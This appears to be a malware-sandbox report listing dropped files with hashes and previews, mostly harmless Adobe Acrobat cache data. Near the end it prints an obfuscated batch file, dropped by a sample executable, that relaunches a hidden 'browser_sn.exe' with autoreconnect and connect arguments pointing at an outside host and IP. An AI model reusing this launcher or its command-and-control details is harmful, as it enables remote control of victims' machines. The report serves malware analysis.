                                                    MD5:CA07D75546B87BC8EDCA04D7BF3F21A5
                                                    SHA1:CF671C154D3E7C733714BDE8B01973C077652A85
                                                    SHA-256:FB934F9E5A00B7235AA2A6D387E35EDC4224A28E2B282E30D3DD38064C6D07ED
                                                    SHA-512:E30A297520F5F45E571D2FC2BBA7EDC746BA4D3DE7043EEA7851AFB9D0D1A48D8D6B066B40803F2E03E4029521F3BB877FE20C66D2FDD5B338139211A0811EDE
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.292822599936216
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfBD2G6UpnrPeUkwRe9:YvXKXWIf5WsdTeO+sGR22cUkee9
                                                    MD5:CEB4756BDBAA775AA2CCB5D90C6BDB3D
                                                    SHA1:5F65B997C372C5EADE5AE0E9C4AE39C10A12264B
                                                    SHA-256:169FC960E2DA8CB9BDBEBAC814DA9754057353CD914CB583FA9D1266EC682362
                                                    SHA-512:6F4544193FDDE5C556F2A73BE52F05105611C1EDA045B968E4E5BAADCF956EDF6D9B60946542D6622B6EE353486DB37D6755A39870751FC78A0F781EF50D2838
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):285
                                                    Entropy (8bit):5.367449683587786
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfPmwrPeUkwRe9:YvXKXWIf5WsdTeO+sGH56Ukee9
                                                    MD5:75551BDD46131EEC35D0D9AF158ECFAE
                                                    SHA1:AD2D5CAE0FA836374473EB3C9D70A1379DBE8591
                                                    SHA-256:4FA557D94B2ED58AD6B7946A01941A8127E7BC01C0B34B3E0B6A1C884C4E7E42
                                                    SHA-512:D5437BB41810D2889A743B1FA4BF61BBE230BB59FBF6000BE8E73CC97AD3A8641974AEC05AB94E6B6C5955982EBC533BE3AC3E6809B703519F27881B4390F541
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1123
                                                    Entropy (8bit):5.687256023563033
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XWYWmeOWpLgE9cQx8LennAvzBvkn0RCmK8czOCCSg:YvqVeFhgy6SAFv5Ah8cv/g
                                                    MD5:B83119D3FE793A307C733D1BDFCEEEBD
                                                    SHA1:5A2DD7DC2596025DF15835F92ACCAB73468096E6
                                                    SHA-256:791F9BF7759E40FCAA0CF7B1DD381BA179FF71AD47E57E81B8FC1FDCB5F17D09
                                                    SHA-512:9B20FA5794F906EC49FA56182E27B553268A8CDEE07059C37404D98C9428909E623310C48D44A283A5060AE952363565BBECFCD45FF50D81ECE0FDC630C7FC7D
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.303325794842211
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJf8dPeUkwRe9:YvXKXWIf5WsdTeO+sGU8Ukee9
                                                    MD5:4070C2C38313EA7C6767D5A94F631CD1
                                                    SHA1:A7365C115FA64D6DE9D0289133C6AA8A0E32FC70
                                                    SHA-256:723533F24C71DF588FD204D0235714A3789F0A7811D3470B614353B0092A5C42
                                                    SHA-512:6AF7FECF8D0C70E724B8A2BFE31D537713D57CA56A00EC5F416562E8FE0B699DA02D07B11CAF6A818743A019BF290D8C036C907FFEBABEE8082E6DA22EC11797
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.307483060736832
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfQ1rPeUkwRe9:YvXKXWIf5WsdTeO+sGY16Ukee9
                                                    MD5:DC4DA4CF8339C53A45BA44270B71C974
                                                    SHA1:57813448BF7D6130E04E9870BFCFDED9054243FE
                                                    SHA-256:16A7EC175D391E0204FB4720F6289C2EC8B8F5BA95456F11D8F5D54AD9BCE03B
                                                    SHA-512:1567B7DEC2D06C01BE7FE755C2308730A6AF636D2AC98D9EEC95E383819417B9DE7057C1F4C6FBB2FE920711B2332B867FBB7DBACC3643251DB48101F065F0D5
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.3232414474707435
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfFldPeUkwRe9:YvXKXWIf5WsdTeO+sGz8Ukee9
                                                    MD5:113C2791E137C7A5A87749A4AF2A8C7F
                                                    SHA1:A61725CB8CBC9F2F94864303CCEB03827AB7AAAD
                                                    SHA-256:3B1AF87BC438E66EAC79CE74A5A3FDE291CD3B057DACE2DA6CC74D0F54A7D1C3
                                                    SHA-512:8D7E768290FF511E211A768661FC29C7365F60AF47D98511FDA8C6D87951922AC7C9EBBE8770AD8BAFFA4801AB9E40B389090D23432285693C6A7CE53212EC44
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):295
                                                    Entropy (8bit):5.330123253505776
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfzdPeUkwRe9:YvXKXWIf5WsdTeO+sGb8Ukee9
                                                    MD5:1BD7D7B34C1B352AB3CA635C95182FE0
                                                    SHA1:0EC7C5823EDBF70B3C4BEE0A362C2693C7085CF6
                                                    SHA-256:45450536935E65C85EA03E0C43F4CF853EF8EF77AAE97A750AFF0488B2B8C647
                                                    SHA-512:B54C1AD39279D833DC08F5383A456FAC6FC3C9870DA79EF5FDE9127B6C42215ABCD58B0721785404F85BAB2D350D9965591CE91B98E949FFC8DA369285053B5C
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):289
                                                    Entropy (8bit):5.310990379654976
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfYdPeUkwRe9:YvXKXWIf5WsdTeO+sGg8Ukee9
                                                    MD5:1A625E0139BC22B95E000B695EEE8464
                                                    SHA1:5558228AF362010BD9CC9F64ABA7A39435941172
                                                    SHA-256:A9DBCA6531FA26EDA26E16D6E8B8F480B1D12CEA907EE2B5A0F63DF904A1076A
                                                    SHA-512:2F4F91080B0E80E29BDD322FF7FE221BC24803A929E96BB601A51654EFB042E7B3B07DD26745E610594662D1509EF55B5B02D399C777222A41932E5FC0FDD59D
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):284
                                                    Entropy (8bit):5.2972342450774095
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJf+dPeUkwRe9:YvXKXWIf5WsdTeO+sG28Ukee9
                                                    MD5:3023CC63332AD010866CE534F9C076E9
                                                    SHA1:1B82650EF27ACB6032C5FB448223730F709B4512
                                                    SHA-256:BF7BDFFB872025A1B0A4138E46E9A7E6159F99457F2731BF6545FC78FADEDE86
                                                    SHA-512:D92201DAC4948F82CBBCC928F10B5C22CF3BB3A30C95EF507DD31F527EB81A2CBFE26362C3E079D50DD6F8555DCBBC4623C975B4F26D8274AB45043582320F69
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):291
                                                    Entropy (8bit):5.294461942073481
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfbPtdPeUkwRe9:YvXKXWIf5WsdTeO+sGDV8Ukee9
                                                    MD5:A89C88A8ECA864ECB45FFCFB002F09F0
                                                    SHA1:AC2A268457AFF4EDFC6530DF1E43DE3A5325CC73
                                                    SHA-256:8363D88D94578DBA43A688CC1216C70DE9D890ED7C8E792A4457A28A91B49B7D
                                                    SHA-512:C86DACE5F177083138CB314CC9F2C91873D29F74F391453B6F1E1CE46DA8CF57AFE964C39BF3B58838EFD9E8E1F849D5C62372B11E878F450215160B7E3C7936
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):287
                                                    Entropy (8bit):5.299265517976599
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJf21rPeUkwRe9:YvXKXWIf5WsdTeO+sG+16Ukee9
                                                    MD5:539EF1459353459AFFAC2AFFDD574F48
                                                    SHA1:6CE76057B25DF6818F09C13D10D4FBF7A9ABD46B
                                                    SHA-256:62184D56C222016C28CC2D97B53132DEF709B8C05947FBFA3A148268BEA59398
                                                    SHA-512:D2838AA9508F97082FF9E3199B1429D9B85E5AFF88A58B7B84C05F37BCD05694C97B0F27B059401BD7DF86780DED1D3635585689F0F33855AB6953A4B1B59094
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):1090
                                                    Entropy (8bit):5.6615957415639695
                                                    Encrypted:false
                                                    SSDEEP:24:Yv6XWYWmeOKamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSg:YvqVexBgkDMUJUAh8cvMg
                                                    MD5:04B03E597B966D8DA95B8E41C5A2FD4A
                                                    SHA1:B5EC18223DEBE01E2BEB27C80D1248F6736F9233
                                                    SHA-256:FDE4BA802BDF4FDA972E23091B75A275EAC2158A2672F59434F28D22DCBAF834
                                                    SHA-512:5E67A1087FE56D4961DFA7886594866C5752D1F9EC7956535E259348B8BA4B04AE09963F7889C3E2AA232A258113C09E420ED9F58E7E4085AFE1D6E5496F1590
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):286
                                                    Entropy (8bit):5.274648659566273
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJfshHHrPeUkwRe9:YvXKXWIf5WsdTeO+sGUUUkee9
                                                    MD5:5066F79460619DB2DB50D1923099239B
                                                    SHA1:556C5E51E901C7A8ACA8EC40C008EDE8CDD84D6E
                                                    SHA-256:3498A82FA52B3CDE8C17A6C4A7E857EBACC1EF13A802F3168AE341037F37B198
                                                    SHA-512:07A15F038FEA4C0A12F7B0F477BB0980CADB00F9ADB447E1911C3A7C04FD0F91627C43B13B4061702458131172FE2A8D657B499A7290076D56ADDC16911B628F
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):282
                                                    Entropy (8bit):5.294146503566172
                                                    Encrypted:false
                                                    SSDEEP:6:YEQXJ2HXWIf5KWWsGiIPEeOF0YOQziEeoAvJTqgFCrPeUkwRe9:YvXKXWIf5WsdTeO+sGTq16Ukee9
                                                    MD5:EB354F092670D2CCB6171E99F78D80A2
                                                    SHA1:DCF6048A83F673B27B79AEBC1DEFBDC420477815
                                                    SHA-256:C5B2DADB221F8216681B601C0F400BE05BEFE51297A91C2807D1B115629A3BC9
                                                    SHA-512:81A6E17CB3E1F3DD8A17939AFCCDC59C264B34A322A09BC16E06A7C92074B48507A83F0BF9D6C1D5767C9548E9835421BD771F189116EB564A974F4F221D9D07
                                                    Malicious:false
                                                    Preview:{"analyticsData":{"responseGUID":"e9075dbc-6196-4174-8a4f-f1d5f11cba2c","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735132543980,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4
                                                    Entropy (8bit):0.8112781244591328
                                                    Encrypted:false
                                                    SSDEEP:3:e:e
                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                    Malicious:false
                                                    Preview:....
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2814
                                                    Entropy (8bit):5.148919685711019
                                                    Encrypted:false
                                                    SSDEEP:48:YWxUB+C4/+OsoZuWlk/vqcUJFAyYup942T:OV4/JsoZviqt3ZBndT
                                                    MD5:B9296C135520BCCD331838D42F860045
                                                    SHA1:2CDF872D2BA29F716B462C788F5764911CE0D61F
                                                    SHA-256:BB523B468B8E980535642CC5678E754337B7C7B619CA2F6259801ADEE04DFDCE
                                                    SHA-512:6212D1A30F2F6917889C0A316BC0636DAD2DA638C664A97AA02E8F46EE4C2C048DC03C3C9F133E93EFF5ED440F84081F7CFFB36B6E1C2A585E86CB43563E2831
                                                    Malicious:false
                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"67140b3a4ab5df76f5444439bb677528","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734956968000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"79c6899c2cb25ea40c5262cdeccd79a2","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734956968000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"e1b14ec051075765977dc4a9075f7ba0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734956968000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"3846285677ccd1159cc2ea1db47f8678","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734956968000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"cd0e792ce9f1cb7c313067235d6f4a87","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734956968000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"4498c821cccc56f68b40d85e79e25dd1","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                    Category:dropped
                                                    Size (bytes):12288
                                                    Entropy (8bit):1.4525061227319425
                                                    Encrypted:false
                                                    SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsGlK:lNVmsw3SHtbDbPe0K3+fDZdE
                                                    MD5:BF46CC8C362366101D09E41E139EE41B
                                                    SHA1:376808839BDF47BC26253FB40F24EC78894A794F
                                                    SHA-256:6DDBCBBF20E26EA4C785F54C8B386C90D3FCBAE5AE29875C03566F392D428ED4
                                                    SHA-512:F4615EE8E9D8E2AF953B83382477B1F3EE4C5DA01F148188D2814715671F17EF7A578C135E99765E182CD5582ED98D2C96D803BA3A83ECCF6872AF6ADB338CEC
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):1.9569814058667885
                                                    Encrypted:false
                                                    SSDEEP:48:7MLrvrBd6dHtbGIbPe0K3+fDy2ds3XqFl2GL7msD:723SHtbDbPe0K3+fDZd6KVmsD
                                                    MD5:F8AFA604B23627FC0A3CC93667A75CA8
                                                    SHA1:38CF820ED99A71C84E2399EFBF82693E811F9C31
                                                    SHA-256:637608345F065567145BC68AA76E96FE3635EA11CBE1EEF9932A54FEFF873E74
                                                    SHA-512:BBB9CD7A4922B0CC53AFBD2BBA1C7CC978A4F4B858E75D01A7A9F8E6D780CA8BA022051FDF6E76E35F202D663E3C4858A66D17640D34EEBAF381E7DECAC8F00C
                                                    Malicious:false
                                                    Preview:.... .c.....N........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):66726
                                                    Entropy (8bit):5.392739213842091
                                                    Encrypted:false
                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgZAFdL8v8OH19xAv9RqmezjxQR0Yyu:6a6TZ44ADEZCdLPOV9xNxQ6K
                                                    MD5:76C01CB0FF7BB152C3E4BB3514BBAB5F
                                                    SHA1:8DBAC253849ACE84A83EABE8A8075BF077F4BD3D
                                                    SHA-256:8F595BD8EB251C66B083576B409C829A4C27663060CF33906D5632A454CBBBE0
                                                    SHA-512:4A45546CBE237A67B0C6E6783A03B837E818A5BD469BAAD74ABCC8A61D545D432D984B04F4F7853B41D923A3A6D695D0C506B3F67553623DE6E387A90192C888
                                                    Malicious:false
                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                    Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                    File Type:DOS batch file, ASCII text
                                                    Category:dropped
                                                    Size (bytes):503
                                                    Entropy (8bit):5.353292454999417
                                                    Encrypted:false
                                                    SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                    MD5:41F0189B83E9D493B86D7182B3514F9D
                                                    SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                    SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                    SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                    Malicious:false
                                                    Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.
                                                    Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                    File Type:DOS batch file, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1001
                                                    Entropy (8bit):5.502266483327757
                                                    Encrypted:false
                                                    SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                    MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                    SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                    SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                    SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                    Malicious:false
